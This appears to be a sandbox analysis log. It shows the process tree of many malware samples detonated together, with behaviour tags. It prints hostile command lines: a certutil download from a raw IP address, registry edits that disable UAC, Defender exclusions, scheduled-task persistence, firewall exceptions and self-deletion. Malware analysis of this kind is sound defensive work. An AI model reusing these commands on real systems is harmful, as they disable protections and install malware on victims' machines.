C:\Users\Admin\Desktop\mal-1\Files\Server.exe"C:\Users\Admin\Desktop\mal-1\Files\Server.exe"3⤵PID:10056
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"4⤵PID:7408
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:7296
-
-
-
-
C:\Users\Admin\Desktop\mal-1\Files\Windows12.exe"C:\Users\Admin\Desktop\mal-1\Files\Windows12.exe"3⤵PID:6980
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "winlogson" /sc ONLOGON /tr "C:\Windows\system32\winlogson\winlogson.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:1720
-
-
-
C:\Users\Admin\Desktop\mal-1\Files\av_downloader.exe"C:\Users\Admin\Desktop\mal-1\Files\av_downloader.exe"3⤵PID:9336
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5623.tmp\5624.tmp\5625.bat C:\Users\Admin\Desktop\mal-1\Files\av_downloader.exe"4⤵PID:12440
-
C:\Windows\system32\mshta.exemshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\Desktop\mal-1\Files\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)5⤵
- Access Token Manipulation: Create Process with Token
PID:8860 -
C:\Users\Admin\Desktop\mal-1\Files\AV_DOW~1.EXE"C:\Users\Admin\Desktop\mal-1\Files\AV_DOW~1.EXE" goto :target6⤵PID:13600
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A4FE.tmp\A4FF.tmp\A510.bat C:\Users\Admin\Desktop\mal-1\Files\AV_DOW~1.EXE goto :target"7⤵PID:7760
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F8⤵PID:11676
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F8⤵PID:11148
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F8⤵PID:12248
-
-
C:\Windows\system32\attrib.exeattrib +s +h e:\net8⤵
- Sets file to hidden
- Views/modifies file attributes
PID:7176
-
-
C:\Windows\system32\certutil.execertutil -urlcache -split -f http://206.217.142.166:1234/windows/dr/dr.bat e:\net\dr\dr.bat8⤵PID:14524
-
-
-
-
-
-
-
C:\Users\Admin\Desktop\mal-1\Files\svchost.exe"C:\Users\Admin\Desktop\mal-1\Files\svchost.exe"3⤵PID:10436
-
-
C:\Users\Admin\Desktop\mal-1\Files\defender64.exe"C:\Users\Admin\Desktop\mal-1\Files\defender64.exe"3⤵PID:9424
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:9240
-
-
-
C:\Users\Admin\Desktop\mal-1\Files\access.exe"C:\Users\Admin\Desktop\mal-1\Files\access.exe"3⤵PID:2996
-
-
C:\Users\Admin\Desktop\mal-1\Files\njrtdhadawt.exe"C:\Users\Admin\Desktop\mal-1\Files\njrtdhadawt.exe"3⤵PID:6720
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\Desktop\mal-1\Files\njrtdhadawt.exe" & rd /s /q "C:\ProgramData\CGIJECFIECBF" & exit4⤵PID:14232
-
C:\Windows\SysWOW64\timeout.exetimeout /t 105⤵
- Delays execution with timeout.exe
PID:5880
-
-
-
-
C:\Users\Admin\Desktop\mal-1\Files\RambledMime.exe"C:\Users\Admin\Desktop\mal-1\Files\RambledMime.exe"3⤵PID:6972
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:14700
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:5632
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:11308
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe5⤵PID:14564
-
-
-
-
-
C:\Users\Admin\Desktop\mal-2\New Text Document mod.exe"C:\Users\Admin\Desktop\mal-2\New Text Document mod.exe"2⤵
- Downloads MZ/PE file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1508 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2972
-
-
C:\Users\Admin\Desktop\mal-2\a\DevMI.exe"C:\Users\Admin\Desktop\mal-2\a\DevMI.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4528
-
-
C:\Users\Admin\Desktop\mal-2\a\black.exe"C:\Users\Admin\Desktop\mal-2\a\black.exe"3⤵
- Executes dropped EXE
PID:1116
-
-
C:\Users\Admin\Desktop\mal-2\a\purple.exe"C:\Users\Admin\Desktop\mal-2\a\purple.exe"3⤵
- Executes dropped EXE
PID:832
-
-
C:\Users\Admin\Desktop\mal-2\a\green.exe"C:\Users\Admin\Desktop\mal-2\a\green.exe"3⤵
- Executes dropped EXE
PID:3412
-
-
C:\Users\Admin\Desktop\mal-2\a\yellow.exe"C:\Users\Admin\Desktop\mal-2\a\yellow.exe"3⤵
- Executes dropped EXE
PID:4752
-
-
C:\Users\Admin\Desktop\mal-2\a\CL.exe"C:\Users\Admin\Desktop\mal-2\a\CL.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:380 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4452
-
-
-
C:\Users\Admin\Desktop\mal-2\a\invoice.exe"C:\Users\Admin\Desktop\mal-2\a\invoice.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2936 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\setup.msi"4⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
PID:432
-
-
-
C:\Users\Admin\Desktop\mal-2\a\_ovvtLvn.exe"C:\Users\Admin\Desktop\mal-2\a\_ovvtLvn.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Drops startup file
- Executes dropped EXE
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:7784 -
C:\ProgramData\kanovemamal\mokajotabet.exe"C:\ProgramData\kanovemamal\mokajotabet.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:9600 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:6660
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c @echo off & ping 127.0.0.1 -n 5 -w 1000 > nul & del "C:\Users\Admin\Desktop\mal-2\a\_ovvtLvn.exe"4⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:14484 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
PID:14500
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 5 -w 10005⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:14516
-
-
-
-
C:\Users\Admin\Desktop\mal-2\a\Muikfjd.exe"C:\Users\Admin\Desktop\mal-2\a\Muikfjd.exe"3⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Executes dropped EXE
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:7900 -
C:\Users\Admin\Desktop\mal-2\a\Muikfjd.exe"{path}"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:14188
-
-
-
C:\Users\Admin\Desktop\mal-2\a\Proxifier.exe"C:\Users\Admin\Desktop\mal-2\a\Proxifier.exe"3⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:12144 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==4⤵
- System Location Discovery: System Language Discovery
PID:13264 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
PID:8960
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe4⤵PID:14284
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:14292
-
-
-
C:\Users\Admin\Desktop\mal-2\a\ffcr.exe"C:\Users\Admin\Desktop\mal-2\a\ffcr.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:12496 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"4⤵
- System Location Discovery: System Language Discovery
PID:7472
-
-
-
C:\Users\Admin\Desktop\mal-2\a\exacag.exe"C:\Users\Admin\Desktop\mal-2\a\exacag.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6696
-
-
C:\Users\Admin\Desktop\mal-2\a\cjrimgid.exe"C:\Users\Admin\Desktop\mal-2\a\cjrimgid.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6368
-
-
C:\Users\Admin\Desktop\mal-2\a\discord.exe"C:\Users\Admin\Desktop\mal-2\a\discord.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
PID:13252 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "DOS Monitor" /xml "C:\Users\Admin\AppData\Local\Temp\tmp30D5.tmp"4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:12008 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:5036
-
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "DOS Monitor Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmp36D1.tmp"4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:9972 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:10292
-
-
-
-
C:\Users\Admin\Desktop\mal-2\a\winX32.exe"C:\Users\Admin\Desktop\mal-2\a\winX32.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:9140 -
C:\Users\Admin\AppData\Roaming\winX32.exe"C:\Users\Admin\AppData\Roaming\winX32.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:9548
-
-
C:\Windows\SysWOW64\attrib.exeattrib +h +r +s "C:\Users\Admin\AppData\Roaming\winX32.exe"4⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:9560 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
PID:13720
-
-
-
-
C:\Users\Admin\Desktop\mal-2\a\CPDB.exe"C:\Users\Admin\Desktop\mal-2\a\CPDB.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:9836
-
-
C:\Users\Admin\Desktop\mal-2\a\Discord2.exe"C:\Users\Admin\Desktop\mal-2\a\Discord2.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6208 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"' & exit4⤵
- System Location Discovery: System Language Discovery
PID:13508 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:13524
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"'5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:13464
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp4CF8.tmp.bat""4⤵
- System Location Discovery: System Language Discovery
PID:10712 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:10588
-
-
C:\Windows\SysWOW64\timeout.exetimeout 35⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:11632
-
-
C:\Users\Admin\AppData\Roaming\Discord.exe"C:\Users\Admin\AppData\Roaming\Discord.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6300
-
-
-
-
C:\Users\Admin\Desktop\mal-2\a\File.exe"C:\Users\Admin\Desktop\mal-2\a\File.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:9208
-
-
C:\Users\Admin\Desktop\mal-2\a\cHSzTDjVl.exe"C:\Users\Admin\Desktop\mal-2\a\cHSzTDjVl.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:8048
-
-
C:\Users\Admin\Desktop\mal-2\a\1.exe"C:\Users\Admin\Desktop\mal-2\a\1.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:14248 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\mal-2\a\1.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:9612 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
PID:9308
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '1.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:12080 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
PID:14528
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update(32bit).exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:14692 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
PID:10848
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update(32bit).exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:11224 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:14932
-
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Java Update(32bit)" /tr "C:\ProgramData\Java Update(32bit).exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:12524 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:8924
-
-
-
-
C:\Users\Admin\Desktop\mal-2\a\inst.exe"C:\Users\Admin\Desktop\mal-2\a\inst.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:14928 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Sets service image path in registry
- Checks BIOS information in registry
- Suspicious behavior: LoadsDriver
PID:10896 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath C:\5⤵
- Command and Scripting Interpreter: PowerShell
PID:11784 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:4016
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Remove-MpPreference -ExclusionPath C:\5⤵PID:11624
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:14220
-
-
-
-
-
C:\Users\Admin\Desktop\mal-2\a\svc.exe"C:\Users\Admin\Desktop\mal-2\a\svc.exe"3⤵
- Executes dropped EXE
PID:2344 -
C:\Users\Admin\AppData\Local\Temp\temp_304.exe"C:\Users\Admin\AppData\Local\Temp\temp_304.exe"4⤵PID:5740
-
C:\Users\Admin\AppData\Local\Temp\temp_304.exe"C:\Users\Admin\AppData\Local\Temp\temp_304.exe"5⤵PID:6884
-
-
-
C:\Users\Admin\AppData\Local\Temp\temp_333.exe"C:\Users\Admin\AppData\Local\Temp\temp_333.exe"4⤵PID:7580
-
-
-
C:\Users\Admin\Desktop\mal-2\a\zx.exe"C:\Users\Admin\Desktop\mal-2\a\zx.exe"3⤵
- Executes dropped EXE
PID:8468 -
C:\Users\Admin\Desktop\mal-2\a\zx.exe"C:\Users\Admin\Desktop\mal-2\a\zx.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4188
-
-
-
C:\Users\Admin\Desktop\mal-2\a\yoda.exe"C:\Users\Admin\Desktop\mal-2\a\yoda.exe"3⤵PID:15208
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c move Advanced Advanced.cmd & Advanced.cmd4⤵PID:15300
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:1972
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"5⤵PID:1624
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:6612
-
-
C:\Windows\SysWOW64\findstr.exefindstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"5⤵PID:8056
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 3287485⤵PID:8432
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Discovery5⤵PID:13284
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "Lean" Lyrics5⤵PID:6116
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 328748\Plenty.com + Tablet + Pointed + Furniture + Rhythm + Children + Cliff + Madness + Amend + Interventions + Deadly + Notre + Wood 328748\Plenty.com5⤵PID:9000
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Biz + ..\Disaster + ..\Administration + ..\Stopped + ..\Broadcasting + ..\Kevin + ..\Pins u5⤵PID:11844
-
-
C:\Users\Admin\AppData\Local\Temp\328748\Plenty.comPlenty.com u5⤵PID:2216
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵PID:10976
-
-
-
-
C:\Users\Admin\Desktop\mal-2\a\updater.exe"C:\Users\Admin\Desktop\mal-2\a\updater.exe"3⤵PID:6844
-
-
C:\Users\Admin\Desktop\mal-2\a\din.exe"C:\Users\Admin\Desktop\mal-2\a\din.exe"3⤵PID:11888
-
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵PID:9552
-
-
-
C:\Users\Admin\Desktop\mal-2\a\msword.exe"C:\Users\Admin\Desktop\mal-2\a\msword.exe"3⤵PID:7652
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c move Hospital Hospital.cmd & Hospital.cmd4⤵PID:11488
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:9076
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"5⤵PID:6560
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:12880
-
-
C:\Windows\SysWOW64\findstr.exefindstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"5⤵PID:7752
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 821215⤵PID:11380
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Sd5⤵PID:10452
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "EXPECTED" Pays5⤵PID:11896
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 82121\Qui.com + Notre + Sheer + Danny + Testament + Prompt + Knee + Sucks + Hindu + Emperor + Pay + Higher + Runtime 82121\Qui.com5⤵PID:8568
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Revision + ..\Ii + ..\Participants V5⤵PID:6352
-
-
C:\Users\Admin\AppData\Local\Temp\82121\Qui.comQui.com V5⤵PID:7340
-
C:\Users\Admin\AppData\Local\Temp\82121\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\82121\RegAsm.exe6⤵PID:5452
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\82121\RegAsm.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:11800
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'RegAsm.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:13956
-
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵PID:13180
-
-
-
-
C:\Users\Admin\Desktop\mal-2\a\Built.exe"C:\Users\Admin\Desktop\mal-2\a\Built.exe"3⤵PID:13768
-
-
C:\Users\Admin\Desktop\mal-2\a\4422_8390.exe"C:\Users\Admin\Desktop\mal-2\a\4422_8390.exe"3⤵PID:9932
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"4⤵PID:3680
-
-
-
C:\Users\Admin\Desktop\mal-2\a\4181_461.exe"C:\Users\Admin\Desktop\mal-2\a\4181_461.exe"3⤵PID:7948
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"4⤵PID:1272
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7948 -s 6644⤵
- Program crash
PID:7444
-
-
-
C:\Users\Admin\Desktop\mal-2\a\EmmetPROD.exe"C:\Users\Admin\Desktop\mal-2\a\EmmetPROD.exe"3⤵PID:14940
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic computersystem get name, TotalPhysicalMemory /Value && wmic os get caption /Value && wmic path Win32_VideoController get CurrentHorizontalResolution,CurrentVerticalResolution /Value && ipconfig | find "IPv4" | find /N ":" | find "[1]"4⤵PID:14084
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic computersystem get name, TotalPhysicalMemory /Value5⤵PID:3604
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic os get caption /Value5⤵PID:6072
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic path Win32_VideoController get CurrentHorizontalResolution,CurrentVerticalResolution /Value5⤵PID:9540
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig5⤵
- Gathers network information
PID:5032
-
-
C:\Windows\SysWOW64\find.exefind "IPv4"5⤵PID:3256
-
-
C:\Windows\SysWOW64\find.exefind /N ":"5⤵PID:14880
-
-
C:\Windows\SysWOW64\find.exefind "[1]"5⤵PID:5732
-
-
-
-
C:\Users\Admin\Desktop\mal-2\a\lem.exe"C:\Users\Admin\Desktop\mal-2\a\lem.exe"3⤵PID:6764
-
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵PID:4560
-
-
-
C:\Users\Admin\Desktop\mal-2\a\1374_2790.exe"C:\Users\Admin\Desktop\mal-2\a\1374_2790.exe"3⤵PID:12632
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"4⤵PID:8116
-
-
-
C:\Users\Admin\Desktop\mal-2\a\29.exe"C:\Users\Admin\Desktop\mal-2\a\29.exe"3⤵PID:11768
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 11768 -s 3924⤵
- Program crash
PID:6896
-
-
-
C:\Users\Admin\Desktop\mal-2\a\5.exe"C:\Users\Admin\Desktop\mal-2\a\5.exe"3⤵PID:6828
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6828 -s 3924⤵
- Program crash
PID:14644
-
-
-
C:\Users\Admin\Desktop\mal-2\a\6.exe"C:\Users\Admin\Desktop\mal-2\a\6.exe"3⤵PID:9348
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9348 -s 2444⤵
- Program crash
PID:6440
-
-
-
C:\Users\Admin\Desktop\mal-2\a\35.exe"C:\Users\Admin\Desktop\mal-2\a\35.exe"3⤵PID:6416
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6416 -s 3964⤵
- Program crash
PID:5416
-
-
-
C:\Users\Admin\Desktop\mal-2\a\43.exe"C:\Users\Admin\Desktop\mal-2\a\43.exe"3⤵PID:9188
-
-
C:\Users\Admin\Desktop\mal-2\a\41.exe"C:\Users\Admin\Desktop\mal-2\a\41.exe"3⤵PID:6264
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6264 -s 3924⤵
- Program crash
PID:9272
-
-
-
C:\Users\Admin\Desktop\mal-2\a\42.exe"C:\Users\Admin\Desktop\mal-2\a\42.exe"3⤵PID:11756
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 11756 -s 3924⤵
- Program crash
PID:15160
-
-
-
C:\Users\Admin\Desktop\mal-2\a\34.exe"C:\Users\Admin\Desktop\mal-2\a\34.exe"3⤵PID:11528
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 11528 -s 3924⤵
- Program crash
PID:6716
-
-
-
C:\Users\Admin\Desktop\mal-2\a\4.exe"C:\Users\Admin\Desktop\mal-2\a\4.exe"3⤵PID:14584
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 14584 -s 3924⤵
- Program crash
PID:1004
-
-
-
C:\Users\Admin\Desktop\mal-2\a\3.exe"C:\Users\Admin\Desktop\mal-2\a\3.exe"3⤵PID:892
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 892 -s 3564⤵
- Program crash
PID:11432
-
-
-
